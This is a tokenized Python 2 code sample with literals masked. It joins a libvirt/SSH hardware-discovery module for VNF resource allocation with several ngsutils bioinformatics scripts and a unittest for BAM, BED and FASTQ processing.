'<STR_LIT>' , <NUM_LIT:0> ) <EOL> print virsh_conn . listDevices ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> for device in net_devices : <EOL> try : <EOL> net_XML = ElementTree . fromstring ( virsh_conn . nodeDeviceLookupByName ( device ) . XMLDesc ( <NUM_LIT:0> ) ) <EOL> parent = net_XML . find ( '<STR_LIT>' ) <EOL> if parent == None : <EOL> print '<STR_LIT>' + device <EOL> continue <EOL> if parent . text == '<STR_LIT>' : <EOL> continue <EOL> if not parent . text . startswith ( '<STR_LIT>' ) : <EOL> print device + '<STR_LIT>' <EOL> continue <EOL> interface = net_XML . find ( '<STR_LIT>' ) . text <EOL> mac = net_XML . find ( '<STR_LIT>' ) . text <EOL> pci_XML = ElementTree . fromstring ( virsh_conn . nodeDeviceLookupByName ( parent . text ) . XMLDesc ( <NUM_LIT:0> ) ) <EOL> name = pci_XML . find ( '<STR_LIT:name>' ) . text . split ( '<STR_LIT:_>' ) <EOL> pci = name [ <NUM_LIT:1> ] + '<STR_LIT::>' + name [ <NUM_LIT:2> ] + '<STR_LIT::>' + name [ <NUM_LIT:3> ] + '<STR_LIT:.>' + name [ <NUM_LIT:4> ] <EOL> capability = pci_XML . find ( '<STR_LIT>' ) <EOL> if capability . get ( '<STR_LIT:type>' ) != '<STR_LIT>' : <EOL> print device + '<STR_LIT>' + parent . text <EOL> continue <EOL> slot = capability . find ( '<STR_LIT>' ) . text <EOL> bus = capability . find ( '<STR_LIT>' ) . text <EOL> node_id = None <EOL> numa_ = capability . find ( '<STR_LIT>' ) <EOL> if numa_ != None : <EOL> node_id = numa_ . get ( '<STR_LIT>' ) ; <EOL> if node_id != None : node_id = int ( node_id ) <EOL> if slot == None or bus == None : <EOL> print device + '<STR_LIT>' + parent . text <EOL> continue <EOL> if slot != '<STR_LIT:0>' : <EOL> virtual = True <EOL> capability_pf = capability . find ( '<STR_LIT>' ) <EOL> if capability_pf . get ( '<STR_LIT:type>' ) != '<STR_LIT>' : <EOL> print '<STR_LIT>' + parent . text <EOL> continue <EOL> PF_pci = capability_pf . find ( '<STR_LIT:address>' ) . attrib <EOL> PF_pci_text = PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] + '<STR_LIT::>' + PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] + '<STR_LIT::>' + PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] + '<STR_LIT:.>' + PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] <EOL> else : <EOL> virtual = False <EOL> if node_id == None : <EOL> node_id = int ( bus ) >> <NUM_LIT:6> <EOL> if not virtual : <EOL> command = '<STR_LIT>' + interface + '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' + command + '<STR_LIT:\n>' + error <EOL> continue <EOL> for line in stdout . readlines ( ) : <EOL> line = line . strip ( ) . rstrip ( '<STR_LIT:\n>' ) . split ( '<STR_LIT>' ) <EOL> if line [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> if line [ <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> speed = int ( line [ <NUM_LIT:1> ] . split ( '<STR_LIT:M>' ) [ <NUM_LIT:0> ] ) * int ( <NUM_LIT> ) <EOL> elif line [ <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> speed = int ( line [ <NUM_LIT:1> ] . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] ) * int ( <NUM_LIT> ) <EOL> elif line [ <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> speed = int ( line [ <NUM_LIT:1> ] . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] ) * int ( <NUM_LIT> ) <EOL> else : <EOL> speed = <NUM_LIT:0> <EOL> elif line [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> if line [ <NUM_LIT:1> ] == '<STR_LIT:yes>' : <EOL> enabled = True <EOL> else : <EOL> enabled = False <EOL> else : <EOL> print '<STR_LIT>' + command + '<STR_LIT::>' <EOL> print line <EOL> continue <EOL> if not node_id in nic_topology : <EOL> nic_topology [ node_id ] = list ( ) <EOL> nic_topology [ node_id ] . append ( Nic ( ) ) <EOL> nic = nic_topology [ node_id ] [ <NUM_LIT:0> ] <EOL> port = Port ( ) <EOL> port . name = interface <EOL> port . virtual = virtual <EOL> port . speed = speed <EOL> if virtual : <EOL> port . available_bw = <NUM_LIT:0> <EOL> port . PF_pci_device_id = PF_pci_text <EOL> else : <EOL> port . available_bw = speed <EOL> if speed == <NUM_LIT:0> : <EOL> port . enabled = False <EOL> else : <EOL> port . enabled = enabled <EOL> port . eligible = virtual <EOL> port . mac = mac <EOL> port . pci_device_id = pci <EOL> port . pci_device_id_split = name [ <NUM_LIT:1> : ] <EOL> nic . add_port ( port ) <EOL> except Exception , e : <EOL> print '<STR_LIT>' + str ( e ) <EOL> for nic in nic_topology . itervalues ( ) : <EOL> for port in nic [ <NUM_LIT:0> ] . ports . itervalues ( ) : <EOL> if port . virtual : <EOL> enabled = nic [ <NUM_LIT:0> ] . ports . get ( port . PF_pci_device_id ) <EOL> if enabled == None : <EOL> return ( False , '<STR_LIT>' + port . PF_pci_device_id + '<STR_LIT>' + port . pci_device_id + '<STR_LIT>' ) <EOL> if nic [ <NUM_LIT:0> ] . ports [ port . PF_pci_device_id ] . enabled : <EOL> port . enabled = True <EOL> else : <EOL> port . enabled = False <EOL> return ( True , warning_text ) <EOL> def get_nic_information_old ( ssh_conn , nic_topology ) : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> tree = ElementTree . fromstring ( stdout . read ( ) ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> if target . get ( "<STR_LIT:type>" ) != "<STR_LIT>" : <EOL> continue <EOL> node_id = int ( target . get ( "<STR_LIT>" ) ) <EOL> nic_topology [ node_id ] = list ( ) <EOL> for entry in target . findall ( "<STR_LIT>" ) : <EOL> if entry . get ( "<STR_LIT:type>" ) != '<STR_LIT>' : <EOL> continue <EOL> nic_name = entry . get ( "<STR_LIT:name>" ) <EOL> model = None <EOL> nic = Nic ( ) <EOL> for pcidev in entry . findall ( "<STR_LIT:object>" ) : <EOL> if pcidev . get ( "<STR_LIT:type>" ) != '<STR_LIT>' : <EOL> continue <EOL> enabled = speed = mac = pci_busid = None <EOL> port = Port ( ) <EOL> model = pcidev . get ( "<STR_LIT:name>" ) <EOL> virtual = False <EOL> if '<STR_LIT>' in model : <EOL> virtual = True <EOL> pci_busid = pcidev . get ( "<STR_LIT>" ) <EOL> for osdev in pcidev . findall ( "<STR_LIT:object>" ) : <EOL> name = osdev . get ( "<STR_LIT:name>" ) <EOL> for info in osdev . findall ( "<STR_LIT:info>" ) : <EOL> if info . get ( "<STR_LIT:name>" ) != '<STR_LIT>' : <EOL> continue <EOL> mac = info . get ( "<STR_LIT:value>" ) <EOL> command = '<STR_LIT>' + name <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> return ( False , '<STR_LIT>' + name + '<STR_LIT>' + error ) <EOL> ethtool = stdout . read ( ) <EOL> if '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> elif '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> elif '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> elif '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> else : <EOL> return ( False , '<STR_LIT>' + name ) <EOL> enabled = False <EOL> if '<STR_LIT>' in ethtool : <EOL> enabled = True <EOL> if speed != None and mac != None and pci_busid != None : <EOL> mac = mac . split ( '<STR_LIT::>' ) <EOL> pci_busid_split = re . split ( '<STR_LIT>' , pci_busid ) <EOL> port . set ( name , virtual , enabled , speed , mac , pci_busid , pci_busid_split ) <EOL> nic . add_port ( port ) <EOL> if len ( nic . ports ) > <NUM_LIT:0> : <EOL> if model != None : <EOL> nic . set_model ( model ) <EOL> else : <EOL> nic . set_model ( nic_name ) <EOL> nic_topology [ node_id ] . append ( nic ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def get_os_information ( ssh_conn , os ) : <EOL> warning_text = "<STR_LIT>" <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , _ ) = ssh_conn . exec_command ( command ) <EOL> id_text = stdout . read ( ) <EOL> if len ( id_text ) == <NUM_LIT:0> : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , _ ) = ssh_conn . exec_command ( command ) <EOL> id_text = stdout . read ( ) <EOL> if len ( id_text ) == <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( "<STR_LIT>" ) <EOL> id_ = id_text . rstrip ( '<STR_LIT:\n>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> type_ = stdout . read ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> bit_architecture = stdout . read ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> ( return_status , code ) = os . set ( id_ , type_ , bit_architecture ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> warning_text += code <EOL> return ( True , warning_text ) <EOL> def get_hypervisor_information ( virsh_conn , hypervisor ) : <EOL> type_ = virsh_conn . getType ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> version = virsh_conn . getVersion ( ) <EOL> lib_version = virsh_conn . getLibVersion ( ) <EOL> domains = list ( ) <EOL> tree = ElementTree . fromstring ( virsh_conn . getCapabilities ( ) ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> os_type = target . find ( "<STR_LIT>" ) . text <EOL> if os_type != '<STR_LIT>' : <EOL> continue <EOL> wordsize = int ( target . find ( '<STR_LIT>' ) . text ) <EOL> if wordsize == <NUM_LIT:64> : <EOL> for domain in target . findall ( "<STR_LIT>" ) : <EOL> domains . append ( domain . get ( "<STR_LIT:type>" ) ) <EOL> ( return_status , code ) = hypervisor . set ( type_ , version , lib_version , domains ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> return ( True , code ) <EOL> class RADavailableResourcesClass ( RADclass ) : <EOL> def __init__ ( self , resources ) : <EOL> """<STR_LIT>""" <EOL> self . reserved = dict ( ) <EOL> self . cores_consumption = None <EOL> self . machine = resources . machine <EOL> self . user = resources . user <EOL> self . password = resources . password <EOL> self . name = resources . name <EOL> self . nr_processors = resources . nr_processors <EOL> self . processor_family = resources . processor_family <EOL> self . processor_manufacturer = resources . processor_manufacturer <EOL> self . processor_version = resources . processor_version <EOL> self . processor_features = resources . processor_features <EOL> self . memory_type = resources . memory_type <EOL> self . memory_freq = resources . memory_freq <EOL> self . memory_nr_channels = resources . memory_nr_channels <EOL> self . memory_size = resources . memory_size <EOL> self . memory_hugepage_sz = resources . memory_hugepage_sz <EOL> self . hypervisor = Hypervisor ( ) <EOL> self . hypervisor . assign ( resources . hypervisor ) <EOL> self . os = OpSys ( ) <EOL> self . os . assign ( resources . os ) <EOL> self . nodes = dict ( ) <EOL> for node_k , node_v in resources . nodes . iteritems ( ) : <EOL> self . nodes [ node_k ] = Node ( ) <EOL> self . nodes [ node_k ] . assign ( node_v ) <EOL> return <EOL> def _get_cores_consumption_warnings ( self ) : <EOL> """<STR_LIT>""" <EOL> warnings = list ( ) <EOL> ( return_status , code ) = get_ssh_connection ( self . machine , self . user , self . password ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> ssh_conn = code <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> return ( False , error ) <EOL> self . cores_consumption = dict ( ) <EOL> for line in stdout . readlines ( ) : <EOL> cpu_usage_split = re . split ( '<STR_LIT>' , line . rstrip ( '<STR_LIT:\n>' ) ) <EOL> usage = <NUM_LIT:100> * ( <NUM_LIT:1> - float ( cpu_usage_split [ <NUM_LIT:10> ] ) ) <EOL> if usage > <NUM_LIT:0> : <EOL> self . cores_consumption [ int ( cpu_usage_split [ <NUM_LIT:1> ] ) ] = usage <EOL> ssh_conn . close ( ) <EOL> for _ , node_v in self . nodes . iteritems ( ) : <EOL> cores = node_v . processor . eligible_cores <EOL> for cpu in cores : <EOL> if len ( cpu ) > <NUM_LIT:1> : <EOL> for core in cpu : <EOL> if core in self . cores_consumption : <EOL> warnings . append ( '<STR_LIT>' + str ( core ) + '<STR_LIT>' + str ( self . cores_consumption [ core ] ) + '<STR_LIT:%>' ) <EOL> else : <EOL> if cpu in self . cores_consumption : <EOL> warnings . append ( '<STR_LIT>' + str ( core ) + '<STR_LIT>' + str ( self . cores_consumption [ cpu ] ) + '<STR_LIT:%>' ) <EOL> return warnings <EOL> def reserved_to_text ( self ) : <EOL> text = str ( ) <EOL> for VNFC_name , VNFC_reserved in self . reserved . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( VNFC_name ) + '<STR_LIT:\n>' <EOL> text += VNFC_reserved . to_text ( ) <EOL> return text <EOL> def obtain_usage ( self ) : <EOL> resp = dict ( ) <EOL> nodes = dict ( ) <EOL> ports_usage = dict ( ) <EOL> hugepage_size = dict ( ) <EOL> for node_k , node_v in self . nodes . iteritems ( ) : <EOL> node = dict ( ) <EOL> ports_usage [ node_k ] = dict ( ) <EOL> eligible_cores = list ( ) <EOL> for pair in node_v . processor . eligible_cores : <EOL> if isinstance ( pair , list ) : <EOL> for element in pair : <EOL> eligible_cores . append ( element ) <EOL> else : <EOL> eligible_cores . append ( pair ) <EOL> node [ '<STR_LIT>' ] = { '<STR_LIT>' : node_v . processor . cores , '<STR_LIT>' : eligible_cores } <EOL> node [ '<STR_LIT>' ] = { '<STR_LIT:size>' : str ( node_v . memory . node_size / ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) + '<STR_LIT>' , '<STR_LIT>' : str ( node_v . memory . eligible_memory / ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) + '<STR_LIT>' } <EOL> hugepage_size [ node_k ] = node_v . memory . hugepage_sz <EOL> ports = dict ( ) <EOL> for nic in node_v . nic_list : <EOL> for port in nic . ports . itervalues ( ) : <EOL> if port . enabled and not port . virtual : <EOL> ports [ port . name ] = { '<STR_LIT>' : str ( port . speed / <NUM_LIT> ) + '<STR_LIT>' } <EOL> ports_usage [ node_k ] [ port . name ] = <NUM_LIT:100> - int ( <NUM_LIT:100> * float ( port . available_bw ) / float ( port . speed ) ) <EOL> node [ '<STR_LIT>' ] = ports <EOL> nodes [ node_k ] = node <EOL> resp [ '<STR_LIT>' ] = nodes <EOL> cores = dict ( ) <EOL> memory = dict ( ) <EOL> for node_k in self . nodes . iterkeys ( ) : <EOL> if not node_k in cores : <EOL> cores [ node_k ] = list ( ) <EOL> memory [ node_k ] = <NUM_LIT:0> <EOL> for _ , reserved in self . reserved . iteritems ( ) : <EOL> if node_k in reserved . node_reserved_resources : <EOL> node_v = reserved . node_reserved_resources [ node_k ] <EOL> cores [ node_k ] . extend ( node_v . reserved_cores ) <EOL> memory [ node_k ] += node_v . reserved_hugepage_nr * hugepage_size [ node_k ] <EOL> occupation = dict ( ) <EOL> for node_k in self . nodes . iterkeys ( ) : <EOL> ports = dict ( ) <EOL> for name , usage in ports_usage [ node_k ] . iteritems ( ) : <EOL> ports [ name ] = { '<STR_LIT>' : str ( usage ) + '<STR_LIT:%>' } <EOL> occupation [ node_k ] = { '<STR_LIT>' : cores [ node_k ] , '<STR_LIT>' : str ( memory [ node_k ] / ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) + '<STR_LIT>' , '<STR_LIT>' : ports } <EOL> resp [ '<STR_LIT>' ] = occupation <EOL> return resp <EOL> class RADreservedResources ( ) : <EOL> def __init__ ( self ) : <EOL> self . node_reserved_resources = dict ( ) <EOL> self . mgmt_interface_pci = None <EOL> self . image = None <EOL> def update ( self , reserved ) : <EOL> self . image = reserved . image <EOL> self . mgmt_interface_pci = reserved . mgmt_interface_pci <EOL> for k , v in reserved . node_reserved_resources . iteritems ( ) : <EOL> if k in self . node_reserved_resources . keys ( ) : <EOL> return ( False , '<STR_LIT>' + str ( k ) + '<STR_LIT>' ) <EOL> self . node_reserved_resources [ k ] = v <EOL> return ( True , "<STR_LIT>" ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . image ) + '<STR_LIT:\n>' <EOL> for node_id , node_reserved in self . node_reserved_resources . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( node_id ) + '<STR_LIT:\n>' <EOL> text += node_reserved . to_text ( ) <EOL> return text <EOL> class NodeReservedResources ( ) : <EOL> def __init__ ( self ) : <EOL> self . reserved_cores = list ( ) <EOL> self . reserved_hugepage_nr = <NUM_LIT:0> <EOL> self . reserved_ports = dict ( ) <EOL> self . vlan_tags = dict ( ) <EOL> self . cpu_pinning = None <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . reserved_cores ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . cpu_pinning ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . reserved_hugepage_nr ) + '<STR_LIT:\n>' <EOL> for port_pci , port_description in self . reserved_ports . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( port_pci ) + '<STR_LIT:\n>' <EOL> text += port_description . to_text ( ) <EOL> return text </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import os <EOL> from ngsutils . bam import bam_pileup_iter , bam_open <EOL> import pysam <EOL> class ExpressedRegion ( object ) : <EOL> _count = <NUM_LIT:0> <EOL> def __init__ ( self , chrom , only_uniq_starts = False ) : <EOL> ExpressedRegion . _count += <NUM_LIT:1> <EOL> self . name = '<STR_LIT>' % ExpressedRegion . _count <EOL> self . chrom = chrom <EOL> self . start = None <EOL> self . end = None <EOL> self . fwd_count = <NUM_LIT:0> <EOL> self . rev_count = <NUM_LIT:0> <EOL> self . reads = set ( ) <EOL> self . read_count = <NUM_LIT:0> <EOL> self . only_uniq_starts = only_uniq_starts <EOL> self . uniq_starts = set ( ) <EOL> def add_column ( self , read , pos ) : <EOL> if not self . start : <EOL> self . start = pos <EOL> if not self . end or pos >= self . end : <EOL> self . end = pos + <NUM_LIT:1> <EOL> if not read . alignment . qname in self . reads : <EOL> self . reads . add ( read . alignment . qname ) <EOL> self . read_count += <NUM_LIT:1> <EOL> if self . only_uniq_starts : <EOL> if not read . alignment . is_reverse : <EOL> if not read . alignment . pos in self . uniq_starts : <EOL> self . uniq_starts . add ( read . alignment . pos ) <EOL> self . fwd_count += <NUM_LIT:1> <EOL> else : <EOL> if not read . alignment . aend in self . uniq_starts : <EOL> self . uniq_starts . add ( read . alignment . aend ) <EOL> self . rev_count += <NUM_LIT:1> <EOL> else : <EOL> if read . alignment . is_reverse : <EOL> self . rev_count += <NUM_LIT:1> <EOL> else : <EOL> self . fwd_count += <NUM_LIT:1> <EOL> def write ( self , fs ) : <EOL> cols = [ ] <EOL> cols . append ( self . chrom ) <EOL> cols . append ( str ( self . start ) ) <EOL> cols . append ( str ( self . end ) ) <EOL> cols . append ( self . name ) <EOL> if self . only_uniq_starts : <EOL> cols . append ( str ( len ( self . uniq_starts ) ) ) <EOL> else : <EOL> cols . append ( str ( self . read_count ) ) <EOL> if self . fwd_count > self . rev_count : <EOL> cols . append ( '<STR_LIT:+>' ) <EOL> else : <EOL> cols . append ( '<STR_LIT:->' ) <EOL> fs . write ( '<STR_LIT:\t>' . join ( cols ) ) <EOL> fs . write ( '<STR_LIT:\n>' ) <EOL> def bam_find_regions ( bam_name , merge_distance = <NUM_LIT:10> , min_read_count = <NUM_LIT:2> , only_uniq_starts = False , nostrand = False , out = sys . stdout ) : <EOL> bamfile = bam_open ( bam_name ) <EOL> region_plus = None <EOL> region_minus = None <EOL> for pileup in bam_pileup_iter ( bamfile , mask = <NUM_LIT> ) : <EOL> chrom = bamfile . getrname ( pileup . tid ) <EOL> for read in pileup . pileups : <EOL> if read . is_del : <EOL> continue <EOL> if nostrand or not read . alignment . is_reverse : <EOL> if not region_plus or region_plus . chrom != chrom or ( region_plus . end + merge_distance ) < pileup . pos : <EOL> if region_plus and region_plus . read_count >= min_read_count : <EOL> region_plus . write ( out ) <EOL> region_plus = ExpressedRegion ( chrom , only_uniq_starts ) <EOL> region_plus . add_column ( read , pileup . pos ) <EOL> else : <EOL> if not region_minus or region_minus . chrom != chrom or ( region_minus . end + merge_distance ) < pileup . pos : <EOL> if region_minus and region_minus . read_count >= min_read_count : <EOL> region_minus . write ( out ) <EOL> region_minus = ExpressedRegion ( chrom , only_uniq_starts ) <EOL> region_minus . add_column ( read , pileup . pos ) <EOL> if region_plus and region_plus . read_count >= min_read_count : <EOL> region_plus . write ( out ) <EOL> if region_minus and region_minus . read_count >= min_read_count : <EOL> region_minus . write ( out ) <EOL> bamfile . close ( ) <EOL> def usage ( ) : <EOL> print __doc__ <EOL> print """<STR_LIT>""" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> uniq = False <EOL> dist = <NUM_LIT:10> <EOL> mincount = <NUM_LIT:2> <EOL> fname = None <EOL> last = None <EOL> nostrand = False <EOL> for arg in sys . argv [ <NUM_LIT:1> : ] : <EOL> if last == '<STR_LIT>' : <EOL> dist = int ( arg ) <EOL> last = None <EOL> elif last == '<STR_LIT>' : <EOL> mincount = int ( arg ) <EOL> last = None <EOL> elif arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> elif arg == '<STR_LIT>' : <EOL> uniq = True <EOL> elif arg == '<STR_LIT>' : <EOL> nostrand = True <EOL> elif arg in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> last = arg <EOL> elif not fname and os . path . exists ( arg ) : <EOL> fname = arg <EOL> else : <EOL> print '<STR_LIT>' % arg <EOL> usage ( ) <EOL> if not fname : <EOL> usage ( ) <EOL> bam_find_regions ( fname , dist , mincount , uniq , nostrand ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> import os <EOL> import ngsutils . bam <EOL> from ngsutils . bam . innerdist import bam_innerdist <EOL> from ngsutils . bam . t import MockBam , _matches <EOL> testbam1 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:100> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = - <NUM_LIT:1> ) <EOL> testbam2 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = - <NUM_LIT:1> ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam3 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:100> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> class InnerDistTest ( unittest . TestCase ) : <EOL> def testError ( self ) : <EOL> failed = False <EOL> try : <EOL> bam_innerdist ( testbam3 , testbam4 ) <EOL> except ValueError : <EOL> failed = True <EOL> self . assertTrue ( failed ) <EOL> def testDist ( self ) : <EOL> total , proper , mean , stdev , o_count = bam_innerdist ( testbam1 , testbam2 ) <EOL> self . assertEqual ( total , <NUM_LIT:6> ) <EOL> self . assertEqual ( proper , <NUM_LIT:4> ) <EOL> self . assertEqual ( mean , <NUM_LIT> ) <EOL> self . assertEqual ( round ( stdev , <NUM_LIT:5> ) , <NUM_LIT> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import sys <EOL> from ngsutils . bed import BedFile <EOL> def usage ( ) : <EOL> print __doc__ <EOL> print """<STR_LIT>""" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def bed_size ( bed , out = sys . stdout ) : <EOL> for region in bed : <EOL> out . write ( '<STR_LIT>' % ( region . end - region . start ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> fname = None <EOL> for arg in sys . argv [ <NUM_LIT:1> : ] : <EOL> if arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> if not fname and ( os . path . exists ( arg ) or arg == '<STR_LIT:->' ) : <EOL> fname = arg <EOL> else : <EOL> print "<STR_LIT>" % arg <EOL> usage ( ) <EOL> if not fname : <EOL> usage ( ) <EOL> bed_size ( BedFile ( fname ) ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import sys <EOL> from ngsutils . fastq import FASTQ <EOL> import ngsutils . support <EOL> def fastq_revcomp ( fastq , out = sys . stdout , quiet = False ) : <EOL> if fastq . is_colorspace : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> for read in fastq . fetch ( quiet = quiet ) : <EOL> seq = ngsutils . support . revcomp ( read . seq ) <EOL> qual = read . qual [ : : - <NUM_LIT:1> ] <EOL> read . clone ( seq = seq , qual = qual ) . write ( out ) <EOL> def usage ( ) : <EOL> print __doc__ <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> fname = None <EOL> for arg in sys . argv [ <NUM_LIT:1> : ] : <EOL> if arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> if not fname and os . path . exists ( arg ) : <EOL> fname = arg <EOL> if not fname : <EOL> usage ( ) <EOL> fq = FASTQ ( fname ) <EOL> fastq_revcomp ( fq ) <EOL> fq . close ( ) </s>
